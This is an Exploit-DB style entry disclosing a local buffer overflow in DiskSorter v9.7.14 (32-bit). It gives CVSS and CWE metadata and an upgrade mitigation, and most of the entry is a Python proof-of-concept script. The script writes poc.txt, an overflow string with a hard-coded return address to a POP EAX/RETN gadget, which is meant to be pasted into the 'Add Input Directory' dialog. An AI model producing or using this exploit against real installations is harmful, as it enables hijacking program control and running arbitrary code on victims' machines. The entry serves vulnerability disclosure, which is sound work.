DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC

vendor:

DiskSorter

by:

n3ckD_

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: DiskSorter

Affected Version From: DiskSorter v9.7.14 (32-Bit)

Affected Version To: DiskSorter v9.7.14 (32-Bit)

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 Enterprise SP1 (Build 7601)

2017

DiskSorter v9.7.14 – Input Directory Local Buffer Overflow – PoC

DiskSorter v9.7.14 (32-Bit) is vulnerable to a local buffer overflow when a user copies the text of poc.txt into the 'Inputs -> Add Input Directory' dialog. This can be exploited to execute arbitrary code by overwriting the return address with a pointer to the shellcode.

Mitigation:

Upgrade to the latest version of DiskSorter.

Source

Exploit-DB raw data:

#!/usr/bin/python

######################################
#	Exploit Title:		DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
# 	Date: 				25 May 2017
# 	Exploit Author: 	n3ckD_
#	Vendor Homepage:	http://www.disksorter.com/
#	Software Link:		http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
#	Version:			Disk Sorter v9.7.14 (32-Bit)
#	Tested on:			Windows 7 Enterprise SP1 (Build 7601)
#	Usage:				Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################

print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"

# in libspg:.text
# 10147C1C   58               POP EAX
# 10147C1D   C3               RETN
ret = "\x1c\x7c\x14\x10"

nops = "\x47\x4F"*24
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"

f = open("poc.txt","w")
f.write(buf)
f.close()